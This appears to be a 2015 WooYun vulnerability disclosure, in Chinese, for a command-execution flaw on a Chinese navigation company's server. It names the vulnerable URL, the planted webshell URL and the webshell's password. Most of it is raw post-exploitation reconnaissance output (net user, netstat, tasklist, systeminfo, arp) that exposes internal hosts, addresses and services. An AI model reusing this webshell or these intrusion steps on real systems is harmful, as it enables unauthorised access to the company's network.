深圳市赛格导航科技股份有限公司官网服务器getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0161781

漏洞标题：深圳市赛格导航科技股份有限公司官网服务器getshell

漏洞作者：朱元璋

提交时间：2015-12-16 13:58

修复时间：2016-01-28 17:10

公开时间：2016-01-28 17:10

漏洞类型：系统/服务补丁不及时

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-16：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-01-28：厂商已经主动忽略漏洞，细节向公众公开
简要描述：

就靠个软件导航，每年收入几亿元，我这屌丝哭了！知识就是金钱。…。………
详细说明：

打开官网http://www.chinagps.cc/，点击图中标识链接
地址http://m.chinagps.cc:9999/driverBook/myCar.action存在命令执行漏洞
直接上传木马到服务器
http://m.chinagps.cc:9999/driverBook/test.jsp密码tom
漏洞证明：

　
[*] 磁盘列表 [ C:D:E:F:G: ]
E:\车圣宝典服务\webapps\driverBook\driverBook\> net user
\\SEGCSBD 的用户帐户
-------------------------------------------------------------------------------
1                        Administrator            Guest                    
SUPPORT_388945a0         webapp                   
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net share
共享名       资源                            注释
-------------------------------------------------------------------------------
IPC$                                         远程 IPC                          
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net view
服务器名称            注释
-------------------------------------------------------------------------------
\\CENTER-7EB6A930                                                              
\\CENTER-PC15                                                                  
\\DELL-0D215E6ACA                                                              
\\DELL-33113689DF                                                              
\\DELL-A8101378DC                                                              
\\DELL-BH111                                                                   
\\DELL-BH12                                                                    
\\DELL-DCE65DCEBC                                                              
\\DELL-PC                                                                      
\\DELL-TJ                                                                      
\\FEEL                                                                         
\\GIS97                                                                        
\\HAIMA2                                                                       
\\HAIMA3                                                                       
\\JKZX-CAD7E5C75D                                                              
\\NATION                                                                       
\\PC201409170355                                                               
\\SAIGE-PC                                                                     
\\SEAT143                                                                      
\\SEAT152                                                                      
\\SEAT191                                                                      
\\SEATX                                                                        
\\SEG-DAA9625F816                                                              
\\SEGCSBD                                                                      
\\SEGVPN                                                                       
\\SZCOMCENTER                                                                  
\\USER-1FOUF4V0OW                                                              
\\WIN-52TUTTR7H26                                                              
\\WIN-UGVBU2D0JBF                                                              
\\WWW-BEA87E1356D                                                              
\\WWW-DDB5978681F                                                              
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net start
已经启动以下 Windows 服务: 
   Apache2.2
   COM+ Event System
   Cryptographic Services
   DbProtectSupport
   DCOM Server Process Launcher
   DHCP Client
   DNS Client
   Event Log
   HID Input Service
   Logical Disk Manager
   Mnopqr Tuvwxyab Defghijk Mnop
   Network Connections
   Network Location Awareness (NLA)
   Plug and Play
   Protected Storage
   Pxrtok fqtbtjepvrsxajzvzy
   Remote Access Connection Manager
   Remote Procedure Call (RPC)
   Security Accounts Manager
   Server
   Shell Hardware Detection
   System Event Notification
   Task Scheduler
   Telephony
   Terminal Services
   VNC Server Version 4
   Windows Audio
   Windows Hels System
   Windows Management Instrumentation
   Windows Test My Test Server 1.0
   Windows Time
   Workstation
   主动防御
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:13             0.0.0.0:0              LISTENING       548
  TCP    0.0.0.0:37             0.0.0.0:0              LISTENING       548
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1072
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       728
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING       492
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       1160
  TCP    0.0.0.0:5074           0.0.0.0:0              LISTENING       1248
  TCP    0.0.0.0:5174           0.0.0.0:0              LISTENING       1248
  TCP    0.0.0.0:7009           0.0.0.0:0              LISTENING       3040
  TCP    0.0.0.0:8009           0.0.0.0:0              LISTENING       3164
  TCP    0.0.0.0:8081           0.0.0.0:0              LISTENING       2436
  TCP    0.0.0.0:8086           0.0.0.0:0              LISTENING       3100
  TCP    0.0.0.0:8087           0.0.0.0:0              LISTENING       3164
  TCP    0.0.0.0:8088           0.0.0.0:0              LISTENING       3040
  TCP    0.0.0.0:8099           0.0.0.0:0              LISTENING       2752
  TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING       2944
  TCP    0.0.0.0:9993           0.0.0.0:0              LISTENING       2300
  TCP    0.0.0.0:9999           0.0.0.0:0              LISTENING       2752
  TCP    0.0.0.0:11211          0.0.0.0:0              LISTENING       2600
  TCP    0.0.0.0:18099          0.0.0.0:0              LISTENING       2944
  TCP    91.0.0.174:139         0.0.0.0:0              LISTENING       4
  TCP    91.0.0.174:1208        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:1230        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:1253        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:1313        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:1480        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:2667        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:2693        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:2710        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:2737        91.235.140.194:43594   ESTABLISHED     2752
  TCP    91.0.0.174:3670        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:3682        91.235.140.194:443     ESTABLISHED     2752
  TCP    91.0.0.174:3683        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:3686        91.235.140.194:43594   ESTABLISHED     2752
  TCP    91.0.0.174:3955        202.105.21.213:20742   ESTABLISHED     6028
  TCP    91.0.0.174:4056        173.254.203.123:8080   CLOSE_WAIT      2720
  TCP    91.0.0.174:4324        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4351        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4374        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4397        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4575        101.199.97.154:80      ESTABLISHED     348
  TCP    91.0.0.174:4612        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4625        202.105.21.213:20742   ESTABLISHED     5288
  TCP    91.0.0.174:4638        111.206.79.140:80      ESTABLISHED     348
  TCP    91.0.0.174:4639        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4643        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4671        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4693        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:4867        173.254.203.123:8091   ESTABLISHED     4664
  TCP    91.0.0.174:4927        14.215.177.49:80       TIME_WAIT       0
  TCP    91.0.0.174:4946        14.18.245.221:80       CLOSE_WAIT      4416
  TCP    91.0.0.174:4947        183.61.46.177:80       ESTABLISHED     4416
  TCP    91.0.0.174:4968        68.71.143.140:7777     ESTABLISHED     2752
  TCP    91.0.0.174:8088        113.106.90.236:44544   TIME_WAIT       0
  TCP    91.0.0.174:8088        113.106.90.236:44732   TIME_WAIT       0
  TCP    91.0.0.174:8088        113.106.90.236:44986   TIME_WAIT       0
  TCP    91.0.0.174:9999        59.37.143.55:10689     FIN_WAIT_1      2752
  TCP    91.0.0.174:9999        110.84.217.153:64485   TIME_WAIT       0
  TCP    91.0.0.174:9999        117.136.75.167:41161   FIN_WAIT_2      2752
  TCP    91.0.0.174:9999        122.228.20.120:43032   FIN_WAIT_1      2752
  TCP    91.0.0.174:9999        171.111.45.41:32419    ESTABLISHED     2752
  TCP    127.0.0.1:1034         127.0.0.1:1035         ESTABLISHED     2300
  TCP    127.0.0.1:1035         127.0.0.1:1034         ESTABLISHED     2300
  TCP    127.0.0.1:1036         127.0.0.1:1037         ESTABLISHED     2300
  TCP    127.0.0.1:1037         127.0.0.1:1036         ESTABLISHED     2300
  TCP    127.0.0.1:1038         127.0.0.1:1039         ESTABLISHED     2300
  TCP    127.0.0.1:1039         127.0.0.1:1038         ESTABLISHED     2300
  TCP    127.0.0.1:1040         127.0.0.1:1041         ESTABLISHED     2300
  TCP    127.0.0.1:1041         127.0.0.1:1040         ESTABLISHED     2300
  TCP    127.0.0.1:1042         127.0.0.1:1043         ESTABLISHED     2436
  TCP    127.0.0.1:1043         127.0.0.1:1042         ESTABLISHED     2436
  TCP    127.0.0.1:1044         127.0.0.1:1045         ESTABLISHED     2436
  TCP    127.0.0.1:1045         127.0.0.1:1044         ESTABLISHED     2436
  TCP    127.0.0.1:1046         127.0.0.1:1047         ESTABLISHED     2436
  TCP    127.0.0.1:1047         127.0.0.1:1046         ESTABLISHED     2436
  TCP    127.0.0.1:1048         127.0.0.1:1049         ESTABLISHED     2436
  TCP    127.0.0.1:1049         127.0.0.1:1048         ESTABLISHED     2436
  TCP    127.0.0.1:1057         127.0.0.1:1058         ESTABLISHED     3100
  TCP    127.0.0.1:1058         127.0.0.1:1057         ESTABLISHED     3100
  TCP    127.0.0.1:1059         127.0.0.1:1060         ESTABLISHED     3100
  TCP    127.0.0.1:1060         127.0.0.1:1059         ESTABLISHED     3100
  TCP    127.0.0.1:1065         127.0.0.1:1066         ESTABLISHED     2944
  TCP    127.0.0.1:1066         127.0.0.1:1065         ESTABLISHED     2944
  TCP    127.0.0.1:1067         127.0.0.1:1068         ESTABLISHED     2944
  TCP    127.0.0.1:1068         127.0.0.1:1067         ESTABLISHED     2944
  TCP    127.0.0.1:1069         127.0.0.1:1070         ESTABLISHED     2944
  TCP    127.0.0.1:1070         127.0.0.1:1069         ESTABLISHED     2944
  TCP    127.0.0.1:1071         127.0.0.1:1072         ESTABLISHED     2944
  TCP    127.0.0.1:1072         127.0.0.1:1071         ESTABLISHED     2944
  TCP    127.0.0.1:1073         127.0.0.1:11211        ESTABLISHED     2944
  TCP    127.0.0.1:1086         127.0.0.1:1087         ESTABLISHED     2752
  TCP    127.0.0.1:1087         127.0.0.1:1086         ESTABLISHED     2752
  TCP    127.0.0.1:1088         127.0.0.1:1089         ESTABLISHED     2752
  TCP    127.0.0.1:1089         127.0.0.1:1088         ESTABLISHED     2752
  TCP    127.0.0.1:1090         127.0.0.1:1091         ESTABLISHED     2752
  TCP    127.0.0.1:1091         127.0.0.1:1090         ESTABLISHED     2752
  TCP    127.0.0.1:1092         127.0.0.1:1093         ESTABLISHED     2752
  TCP    127.0.0.1:1093         127.0.0.1:1092         ESTABLISHED     2752
  TCP    127.0.0.1:1094         127.0.0.1:11211        ESTABLISHED     2752
  TCP    127.0.0.1:1107         127.0.0.1:1108         ESTABLISHED     2752
  TCP    127.0.0.1:1108         127.0.0.1:1107         ESTABLISHED     2752
  TCP    127.0.0.1:1109         127.0.0.1:1110         ESTABLISHED     2752
  TCP    127.0.0.1:1110         127.0.0.1:1109         ESTABLISHED     2752
  TCP    127.0.0.1:1761         127.0.0.1:1762         ESTABLISHED     2944
  TCP    127.0.0.1:1762         127.0.0.1:1761         ESTABLISHED     2944
  TCP    127.0.0.1:1763         127.0.0.1:1764         ESTABLISHED     2944
  TCP    127.0.0.1:1764         127.0.0.1:1763         ESTABLISHED     2944
  TCP    127.0.0.1:7005         0.0.0.0:0              LISTENING       3040
  TCP    127.0.0.1:8005         0.0.0.0:0              LISTENING       3100
  TCP    127.0.0.1:8006         0.0.0.0:0              LISTENING       3164
  TCP    127.0.0.1:8025         0.0.0.0:0              LISTENING       2944
  TCP    127.0.0.1:11211        127.0.0.1:1073         ESTABLISHED     2600
  TCP    127.0.0.1:11211        127.0.0.1:1094         ESTABLISHED     2600
  TCP    127.0.0.1:18025        0.0.0.0:0              LISTENING       2752
  TCP    192.110.1.174:139      0.0.0.0:0              LISTENING       4
  TCP    192.110.1.174:1056     192.110.1.175:3306     ESTABLISHED     2436
  TCP    192.110.1.174:1063     192.110.1.178:61616    ESTABLISHED     2944
  TCP    192.110.1.174:1085     192.110.1.178:61616    ESTABLISHED     2752
  TCP    192.110.1.174:1122     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1123     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1124     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1125     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1126     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1127     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1128     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1129     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1130     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1131     192.110.1.175:3306     ESTABLISHED     3040
  TCP    192.110.1.174:1174     192.110.1.175:3306     ESTABLISHED     3100
  TCP    192.110.1.174:1525     192.110.1.175:3306     ESTABLISHED     2436
  TCP    192.110.1.174:2702     192.110.1.175:3306     ESTABLISHED     3164
  TCP    192.110.1.174:2703     192.110.1.175:3306     ESTABLISHED     3164
  TCP    192.110.1.174:2704     192.110.1.175:3306     ESTABLISHED     3164
  TCP    192.110.1.174:2705     192.110.1.175:3306     ESTABLISHED     3164
  TCP    192.110.1.174:2706     192.110.1.175:3306     ESTABLISHED     3164
  TCP    192.110.1.174:2958     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:2959     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:2976     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:2977     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:2978     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:2979     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:2980     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:2981     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:3057     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:3058     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:3061     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:3062     192.110.1.175:3306     ESTABLISHED     2752
  TCP    192.110.1.174:3141     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4298     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4343     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4362     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4445     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4562     192.110.1.3:37         CLOSE_WAIT      548
  TCP    192.110.1.174:4568     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4620     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4665     192.110.1.175:3306     ESTABLISHED     2944
  TCP    192.110.1.174:4691     192.110.1.175:3306     ESTABLISHED     2300
  TCP    192.110.1.174:4695     192.110.1.175:3306     ESTABLISHED     3100
  TCP    192.110.1.174:4699     192.110.1.175:3306     ESTABLISHED     3100
  TCP    192.110.1.174:4722     192.110.1.175:3306     ESTABLISHED     3100
  TCP    192.110.1.174:4938     192.110.1.135:139      TIME_WAIT       0
  TCP    192.110.1.174:4969     192.110.1.175:3306     ESTABLISHED     3100
  TCP    192.110.1.174:8081     192.110.10.218:42286   ESTABLISHED     2436
  TCP    192.110.1.174:8081     192.110.10.218:44391   ESTABLISHED     2436
  TCP    192.110.1.174:8081     192.110.10.219:33398   ESTABLISHED     2436
  TCP    192.110.1.174:8081     192.110.10.219:34017   ESTABLISHED     2436
  UDP    0.0.0.0:37             *:*                                    548
  UDP    0.0.0.0:123            *:*                                    548
  UDP    0.0.0.0:1031           *:*                                    348
  UDP    0.0.0.0:1138           *:*                                    2608
  UDP    0.0.0.0:1150           *:*                                    2608
  UDP    0.0.0.0:1945           *:*                                    2608
  UDP    0.0.0.0:1946           *:*                                    2608
  UDP    0.0.0.0:2913           *:*                                    2720
  UDP    0.0.0.0:2933           *:*                                    2608
  UDP    0.0.0.0:2935           *:*                                    2608
  UDP    0.0.0.0:2952           *:*                                    2608
  UDP    0.0.0.0:2953           *:*                                    2608
  UDP    0.0.0.0:2957           *:*                                    2608
  UDP    0.0.0.0:2958           *:*                                    2608
  UDP    0.0.0.0:3600           *:*                                    348
  UDP    0.0.0.0:4132           *:*                                    4664
  UDP    0.0.0.0:4133           *:*                                    4664
  UDP    0.0.0.0:4134           *:*                                    4664
  UDP    0.0.0.0:4135           *:*                                    4664
  UDP    0.0.0.0:4136           *:*                                    4664
  UDP    0.0.0.0:4137           *:*                                    4664
  UDP    0.0.0.0:4138           *:*                                    4664
  UDP    0.0.0.0:4139           *:*                                    4664
  UDP    0.0.0.0:4140           *:*                                    4664
  UDP    0.0.0.0:4141           *:*                                    4664
  UDP    0.0.0.0:4966           *:*                                    2608
  UDP    91.0.0.174:123         *:*                                    1216
  UDP    91.0.0.174:137         *:*                                    4
  UDP    91.0.0.174:138         *:*                                    4
  UDP    127.0.0.1:123          *:*                                    1216
  UDP    127.0.0.1:1393         *:*                                    348
  UDP    127.0.0.1:2916         *:*                                    2720
  UDP    127.0.0.1:2920         *:*                                    4416
  UDP    192.110.1.174:123      *:*                                    1216
  UDP    192.110.1.174:137      *:*                                    4
  UDP    192.110.1.174:138      *:*                                    4
系统找不到指定的路径。
E:\车圣宝典服务\bin\> tasklist /svc
映像名称                       PID 服务                                        
========================= ======== ============================================
System Idle Process              0 暂缺                                        
System                           4 暂缺                                        
smss.exe                       360 暂缺                                        
csrss.exe                      408 暂缺                                        
winlogon.exe                   432 暂缺                                        
services.exe                   480 Eventlog, PlugPlay                          
lsass.exe                      492 ProtectedStorage, SamSs                     
svchost.exe                    668 DcomLaunch                                  
svchost.exe                    728 RpcSs                                       
svchost.exe                    808 Dhcp, Dnscache                              
ZhuDongFangYu.exe              824 ZhuDongFangYu                               
svchost.exe                    904 AudioSrv, CryptSvc, dmserver, EventSystem,  
                                   HidServ, lanmanserver, lanmanworkstation,   
                                   Netman, Nla, RasMan, Schedule, SENS,        
                                   ShellHWDetection, winmgmt                   
httpd.exe                     1072 Apache2.2                                   
svchost.exe                   1160 TermService                                 
svchost.exe                   1216 W32Time                                     
svchost.exe                   1232 WinHelpss                                   
winvnc4.exe                   1248 WinVNC4                                     
httpd.exe                     1404 暂缺                                        
explorer.exe                  1936 暂缺                                        
RTDCPL.EXE                     184 暂缺                                        
360tray.exe                    348 暂缺                                        
ctfmon.exe                     380 暂缺                                        
360sd.exe                      384 暂缺                                        
ApacheMonitor.exe              132 暂缺                                        
AboutTime.exe                  548 暂缺                                        
svchost.exe                   1176 TapiSrv                                     
wmiprvse.exe                  1932 暂缺                                        
cmd.exe                       2284 暂缺                                        
java.exe                      2300 暂缺                                        
conime.exe                    2304 暂缺                                        
cmd.exe                       2428 暂缺                                        
java.exe                      2436 暂缺                                        
memcached.exe                 2600 暂缺                                        
360rp.exe                     2608 暂缺                                        
java.exe                      2752 暂缺                                        
java.exe                      2944 暂缺                                        
java.exe                      3040 暂缺                                        
java.exe                      3100 暂缺                                        
java.exe                      3164 暂缺                                        
iexplore.exe                  2720 暂缺                                        
cmd.exe                       6124 暂缺                                        
love.exe                      4416 暂缺                                        
Vswzuav.exe                   6028 Wsrtoj ugjqsyuf                             
vmware-vmx.exe                4664 Windows Test My Test 1.0                    
hl.exe                        4872 暂缺                                        
svchost.exe                   5288 Mnopqr Tuvwxyab Def                         
svchost.exe                  18560 DbProtectSupport                            
cmd.exe                      18840 暂缺                                        
tasklist.exe                 19512 暂缺                                        
wmiprvse.exe                 17656 暂缺                                        
系统找不到指定的路径。
E:\车圣宝典服务\bin\> ipconfig /all
Windows IP Configuration
   Host Name . . . . . . . . . . . . : segcsbd
   Primary Dns Suffix  . . . . . . . : 
   Node Type . . . . . . . . . . . . : Unknown
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 192.174:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Broadcom NetLink (TM) Gigabit Ethernet #2
   Physical Address. . . . . . . . . : 00-25-64-C8-56-49
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 192.110.1.174
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 
Ethernet adapter 91.174:
   Connection-specific DNS Suffix  . : 
   Description . . . . . . . . . . . : Realtek RTL8139 Family PCI Fast Ethernet NIC
   Physical Address. . . . . . . . . : D8-5D-4C-6F-19-64
   DHCP Enabled. . . . . . . . . . . : No
   IP Address. . . . . . . . . . . . : 91.0.0.174
   Subnet Mask . . . . . . . . . . . : 255.255.0.0
   Default Gateway . . . . . . . . . : 91.0.0.2
   DNS Servers . . . . . . . . . . . : 202.96.128.68
                                       202.96.134.133
系统找不到指定的路径。
E:\车圣宝典服务\bin\> systeminfo
主机名:           SEGCSBD
OS 名称:          Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本:          5.2.3790 Service Pack 2 Build 3790
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     segbbs
注册的组织:       
产品 ID:          69713-640-2197216-45203
初始安装日期:     2013-8-2, 13:44:14
系统启动时间:     8 天 15 小时 20 分 26 秒
系统制造商:       Dell Inc.
系统型号:         OptiPlex 380                 
系统类型:         X86-based PC
处理器:           安装了 2 个处理器。
                  [01]: x86 Family 6 Model 23 Stepping 10 GenuineIntel ~2593 Mhz
                  [02]: x86 Family 6 Model 23 Stepping 10 GenuineIntel ~2593 Mhz
BIOS 版本:        DELL   - 15
Windows 目录:     C:\WINDOWS
系统目录:         C:\WINDOWS\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (GMT+08:00) 北京，重庆，香港特别行政区，乌鲁木齐
物理内存总量:     2,012 MB
可用的物理内存:   680 MB
页面文件: 最大值: 3,910 MB
页面文件: 可用:   2,480 MB
页面文件: 使用中: 1,430 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       \\SEGCSBD
修补程序:         安装了 484 个修补程序。
                  [01]: File 1
                  [02]: File 1
                  [03]: File 1
                  [04]: File 1
                  [05]: File 1
                  [06]: File 1
                  [07]: File 1
                  [08]: File 1
                  [09]: File 1
                  [10]: File 1
                  [11]: File 1
                  [12]: File 1
                  [13]: File 1
                  [14]: File 1
                  [15]: File 1
                  [16]: File 1
                  [17]: File 1
                  [18]: File 1
                  [19]: File 1
                  [20]: File 1
                  [21]: File 1
                  [22]: File 1
                  [23]: File 1
                  [24]: File 1
                  [25]: File 1
                  [26]: File 1
                  [27]: File 1
                  [28]: File 1
                  [29]: File 1
                  [30]: File 1
                  [31]: File 1
                  [32]: File 1
                  [33]: File 1
                  [34]: File 1
                  [35]: File 1
                  [36]: File 1
                  [37]: File 1
                  [38]: File 1
                  [39]: File 1
                  [40]: File 1
                  [41]: File 1
                  [42]: File 1
                  [43]: File 1
                  [44]: File 1
                  [45]: File 1
                  [46]: File 1
                  [47]: File 1
                  [48]: File 1
                  [49]: File 1
                  [50]: File 1
                  [51]: File 1
                  [52]: File 1
                  [53]: File 1
                  [54]: File 1
                  [55]: File 1
                  [56]: File 1
                  [57]: File 1
                  [58]: File 1
                  [59]: File 1
                  [60]: File 1
                  [61]: File 1
                  [62]: File 1
                  [63]: File 1
                  [64]: File 1
                  [65]: File 1
                  [66]: File 1
                  [67]: File 1
                  [68]: File 1
                  [69]: File 1
                  [70]: File 1
                  [71]: File 1
                  [72]: File 1
                  [73]: File 1
                  [74]: File 1
                  [75]: File 1
                  [76]: File 1
                  [77]: File 1
                  [78]: File 1
                  [79]: File 1
                  [80]: File 1
                  [81]: File 1
                  [82]: File 1
                  [83]: File 1
                  [84]: File 1
                  [85]: File 1
                  [86]: File 1
                  [87]: File 1
                  [88]: File 1
                  [89]: File 1
                  [90]: File 1
                  [91]: File 1
                  [92]: File 1
                  [93]: File 1
                  [94]: File 1
                  [95]: File 1
                  [96]: File 1
                  [97]: File 1
                  [98]: File 1
                  [99]: File 1
                  [100]: File 1
                  [101]: File 1
                  [102]: File 1
                  [103]: File 1
                  [104]: File 1
                  [105]: File 1
                  [106]: File 1
                  [107]: File 1
                  [108]: File 1
                  [109]: File 1
                  [110]: File 1
                  [111]: File 1
                  [112]: File 1
                  [113]: File 1
                  [114]: File 1
                  [115]: File 1
                  [116]: File 1
                  [117]: File 1
                  [118]: File 1
                  [119]: File 1
                  [120]: File 1
                  [121]: File 1
                  [122]: File 1
                  [123]: File 1
                  [124]: File 1
                  [125]: File 1
                  [126]: File 1
                  [127]: File 1
                  [128]: File 1
                  [129]: File 1
                  [130]: File 1
                  [131]: File 1
                  [132]: File 1
                  [133]: File 1
                  [134]: File 1
                  [135]: File 1
                  [136]: File 1
                  [137]: File 1
                  [138]: File 1
                  [139]: File 1
                  [140]: File 1
                  [141]: File 1
                  [142]: File 1
                  [143]: File 1
                  [144]: File 1
                  [145]: File 1
                  [146]: File 1
                  [147]: File 1
                  [148]: File 1
                  [149]: File 1
                  [150]: File 1
                  [151]: File 1
                  [152]: File 1
                  [153]: File 1
                  [154]: File 1
                  [155]: File 1
                  [156]: File 1
                  [157]: File 1
                  [158]: File 1
                  [159]: File 1
                  [160]: File 1
                  [161]: File 1
                  [162]: File 1
                  [163]: File 1
                  [164]: File 1
                  [165]: File 1
                  [166]: File 1
                  [167]: File 1
                  [168]: File 1
                  [169]: File 1
                  [170]: File 1
                  [171]: File 1
                  [172]: File 1
                  [173]: File 1
                  [174]: File 1
                  [175]: File 1
                  [176]: File 1
                  [177]: File 1
                  [178]: File 1
                  [179]: File 1
                  [180]: File 1
                  [181]: File 1
                  [182]: File 1
                  [183]: File 1
                  [184]: File 1
                  [185]: File 1
                  [186]: File 1
                  [187]: File 1
                  [188]: File 1
                  [189]: File 1
                  [190]: File 1
                  [191]: File 1
                  [192]: File 1
                  [193]: File 1
                  [194]: File 1
                  [195]: File 1
                  [196]: File 1
                  [197]: File 1
                  [198]: File 1
                  [199]: File 1
                  [200]: File 1
                  [201]: File 1
                  [202]: File 1
                  [203]: File 1
                  [204]: File 1
                  [205]: File 1
                  [206]: File 1
                  [207]: File 1
                  [208]: File 1
                  [209]: File 1
                  [210]: File 1
                  [211]: File 1
                  [212]: File 1
                  [213]: File 1
                  [214]: File 1
                  [215]: File 1
                  [216]: File 1
                  [217]: File 1
                  [218]: File 1
                  [219]: File 1
                  [220]: File 1
                  [221]: File 1
                  [222]: File 1
                  [223]: File 1
                  [224]: File 1
                  [225]: File 1
                  [226]: File 1
                  [227]: File 1
                  [228]: File 1
                  [229]: File 1
                  [230]: File 1
                  [231]: File 1
                  [232]: File 1
                  [233]: File 1
                  [234]: File 1
                  [235]: File 1
                  [236]: Q147222
                  [237]: KB2656358 - QFE
                  [238]: KB2742604 - QFE
                  [239]: KB2833949 - QFE
                  [240]: KB2894845 - QFE
                  [241]: KB2901115 - QFE
                  [242]: KB2931352 - QFE
                  [243]: KB2972207 - QFE
                  [244]: KB3037572 - QFE
                  [245]: KB933854 - QFE
                  [246]: SP1 - SP
                  [247]: KB975558_WM8
                  [248]: KB925398_WMP64
                  [249]: KB2564958 - Update
                  [250]: KB971513 - Update
                  [251]: KB914961 - Service Pack
                  [252]: KB2115168 - Update
                  [253]: KB2229593 - Update
                  [254]: KB2296011 - Update
                  [255]: KB2345886 - Update
                  [256]: KB2347290 - Update
                  [257]: KB2378111 - Update
                  [258]: KB2387149 - Update
                  [259]: KB2393802 - Update
                  [260]: KB2419635 - Update
                  [261]: KB2423089 - Update
                  [262]: KB2443105 - Update
                  [263]: KB2476490 - Update
                  [264]: KB2478960 - Update
                  [265]: KB2483185 - Update
                  [266]: KB2485663 - Update
                  [267]: KB2492386 - Update
                  [268]: KB2506212 - Update
                  [269]: KB2508429 - Update
                  [270]: KB2509553 - Update
                  [271]: KB2535512 - Update
                  [272]: K
网卡:             安装了 2 个 NIC。
                  [01]: Broadcom NetLink (TM) Gigabit Ethernet
                      连接名:      192.174
                      启用 DHCP:   否
                      IP 地址
                      [01]: 192.110.1.174
                  [02]: Realtek RTL8139 Family PCI Fast Ethernet NIC
                      连接名:      91.174
                      启用 DHCP:   否
                      IP 地址
                      [01]: 91.0.0.174
系统找不到指定的路径。
E:\车圣宝典服务\bin\> net config
控制下列正在运行的服务:
   Server
   Workstation
命令成功完成。
系统找不到指定的路径。
E:\车圣宝典服务\bin\> arp -a
Interface: 192.110.1.174 --- 0x2
  Internet Address      Physical Address      Type
  192.110.1.95          c8-d3-a3-01-12-51     dynamic   
  192.110.1.109         00-19-bb-41-c0-f8     dynamic   
  192.110.1.134         bc-30-5b-a4-b8-ef     dynamic   
  192.110.1.135         00-19-bb-41-c0-d9     dynamic   
  192.110.1.154         d4-be-d9-bd-f8-85     dynamic   
  192.110.1.175         bc-30-5b-cd-36-ac     dynamic   
  192.110.1.178         00-15-5d-00-de-27     dynamic   
  192.110.1.182         00-1d-09-07-7c-00     dynamic   
  192.110.1.192         00-14-22-19-e7-b2     dynamic   
  192.110.8.194         84-8f-69-df-4f-1b     dynamic   
